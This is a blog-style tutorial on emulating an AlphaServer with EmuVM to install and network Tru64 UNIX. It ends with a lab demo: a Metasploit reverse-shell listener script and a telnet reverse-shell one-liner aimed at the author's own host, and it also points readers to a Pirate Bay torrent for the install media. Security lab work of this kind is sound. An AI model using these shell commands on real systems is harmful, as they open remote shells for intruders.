With Virtual technology nowadays it is possible to emulate almost anything, and for those that wish to play around with not-so-common operation systems for the Alpha processor family there exists a great software called EmuVM, which is available for free for either Windows or Linux here emuvm.com/downloads.php
This emulator is capable of emulation a various number of Alpha servers and is probably the best choice for a modern 64bit linux system. I have made all tests on Debian 64bit with GRSEC patched kernel 3.6.55. There is very little information about Tru64 UNIX regarding installing and running inside a VM so I have decided to update this gap with some of my findings. Also I will show you how to perform some simple Metasploit operations against the Tru64 system.
So the first thing is probably obtaining a copy of the EmuVM software from the above link, I have used the stable version alphavm-free-1-3-9.tgz. Once unpacked there are 2 important files, the alphavm binary and the configuration file. I will post my configuration file that I have used to install Tru64 5.1B which emulates the AlphaServer DS10 616 MhZ
Here is the example config.emu for the above model
system {
type = ds10_616;
reported_type = default;
num_cpus = 1;
ssn = 'EmuVM-00-000-001';
interval_clock_freq = 1000;
memory {
size = 512;
}
cpu {
server = basic;
jit {
async = yes;
}
}
serial com1 {
server = socket;
port = 3000;
}
serial com2 {
server = socket;
port = 3001;
}
scsi_controller qla0 {
scsi_id = 7;
}
scsi_controller qla1 {
scsi_id = 7;
}
scsi_disk dka0 {
scsi_bus = 0;
scsi_id = 0;
scsi_lun = 0;
file = 'disk.dd';
caching = no;
write_through = yes;
}
scsi_cdrom iso {
scsi_id = 4;
file = 'Tru64.iso';
}
ether eth0 {
type = dec21040;
server = dummy;
mac_address = 0x08002B000001;
}
ether eth1 {
type = dec21040;
server = tap;
interface = 'tap0';
mac_address = 0x08002B000002;
}
}
The important parts in this config file are the virtual disk location and the network card settings. I have kept all the files in the root folder where the alphavm binary resides. In order for us to install Tru64 onto a harddisk we need to prepare a file that will hold the system on our host. (2 Gigs is enough)
dd if=/dev/zero of=disk.dd bs=1024 count=2M
Once we have this, next step is getting the installation media for the actual Tru64 System. If you have the CDs you can just dd them into an ISO, if not, have a look on the PirateBay, there is a torrent that has the :
-rw-r--r-- 1 user user 443 Feb 8 10:00 README.txt -rw-r--r-- 1 user user 216601968 Feb 8 10:00 T64V51BB27AS0006_install.iso.bz2 -rw-r--r-- 1 user user 427318884 Feb 8 10:00 Tru64_5.1B_GNU_VOL1.img.bz2 -rw-r--r-- 1 user user 531119101 Feb 8 10:00 Tru64_5.1B_PORT_VOL1.img.bz2 -rw-r--r-- 1 user user 429326071 Feb 8 10:00 V5.1Br2650_A1.iso.bz2 -rw-r--r-- 1 user user 343522410 Feb 8 10:00 V5.1Br2650_A2.iso.bz2 -rw-r--r-- 1 user user 383672280 Feb 8 10:00 V5.1Br2650_O1.iso.bz2
You really only need the install ISO V5.1Br2650_O1.iso.bz2 and the PATCH ISO T64V51BB27AS0006_install.iso.bz2
So once you have the ISO and HDD file in place, boot the VM like so :
./alphavm_free config.emu
And connect to the VM machine via socat like so:
socat -,raw,echo=0,escape=0x1c tcp:127.0.0.1:3000
Of course you can use other programs to connect like telnet or putty but there are problems with escape sequences in the terminal emulation, best results for me are with socat.
user@Obelix:~/KVM/Alpha/Tru64$ ./connect.console.sh Welcome to EmuVM hardware emulator. Copyright 2010 - 2012, Artem Alimarin. All rights reserved. Please visit http://emuvm.com for more information. show devices pka SCSI Controller dka0 SCSI 0 14 0 0 0 0 0 dka400 SCSI 0 14 0 0 400 0 0 pkb SCSI Controller ewa MOP 0 9 0 0 0 3 0 (08:00:2b:00:00:01) ewb MOP 0 11 0 0 0 3 0 (08:00:2b:00:00:02) >>>
So we first need to boot the CD in order to install Tru64, this has to be done by telling which SCSI device to boot from, in our case it is dka400 (CDROM) while the dka0 is the HDD.
boot dka400
The ISO boots into a single user mode from which we can perform the actual installation. Anybody with some background with Linux/BSD/Unix can setup the system, it is not difficult and I am not going to cover this here, simply experiment or use default values during the installer process. Once finished you can apply the 5.1B patches from the other ISO to the current system but it is not necessary (must be installed from the Tru64 as the patch CD is not bootable)
Once finished boot the HDD via :
boot dka0
The most important thing is setting up the network on the host and the guest. First I will show and example how to configure this via a simple shellscript that configures the tap0 and bridge interfaces. In my scenario I use a laptop with 2 network cards, one is wlan0 (wireless) other is eth0 (Ethernet). I have decided to use the Ethernet interface for interacting with the guest VM and wireless for internet connection. So here is the script that sets up the necessary stuff:
tunctl -t tap0 -u user ifconfig tap0 up brctl addbr br0 brctl addif br0 eth0 brctl setfd br0 0 ifconfig eth0 10.0.2.1 up ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up route add -net 0.0.0.0/0 gw 10.0.2.1 brctl addif br0 tap0 ifconfig tap0 0.0.0.0
Explanation: I setup my eth0 as 10.0.2.1 and the Tru64 VM as 10.2.10 so the VM and HOST can communicate on this sub-net. Wireless is on another sub-net, but I don’t plan to connect the VM to the internet. So before starting the AlphaVM run this script first to get the network working. I have used a second virtual interface in the config.emu
ether eth1 {
type = dec21040;
server = tap;
interface = 'tap0';
mac_address = 0x08002B000002;
}
The first one is just a dummy the second one using tap0 interface, make sure you don’t have the same MAC address as the tap0 device.
On the Tru64 system I have a fixed IP address for the tu1 interface like so:
tu1: flags=c63<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST,SIMPLEX> inet 10.0.2.10 netmask ffffff00 broadcast 10.0.2.255 ipmtu 1500
So now lets see how we can perform a first test on the Virtual Tru64. Lets see if we can get a reverse shell. As there is very limited info about Alpha shellcode :) we are probably stuck in using something inbuilt, like telnet or perl. Telnet reverse shell works fine. You can try running a Metasploit listerner on the host via this script:
#!/bin/bash clear echo "***************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo "***************************************************************" echo -e "What Port Number are we gonna listen to? : \c" read port echo " starting the meterpreter listener.." ./msfcli exploit/multi/handler PAYLOAD=cmd/unix/reverse LHOST=10.0.2.1 LPORT=$port E
And run the following command on the target Tru64 system:
sh -c '(sleep 4074|telnet 10.0.2.1 8000|while : ; do sh && break; done 2>&1|telnet 10.0.2.1 8000 >/dev/null 2>&1 &)'
It works well, and for our educational purposes this servers as a good example. I believe there is a book out there called ShellCoders HandBook that covers Tru64 security in one dedicated chapter. The examples there can be verified using this VM setup and one can gain some knowledge of Tru64 Unix.
Here is a little video demonstration of the above Metasploit test against Tru64
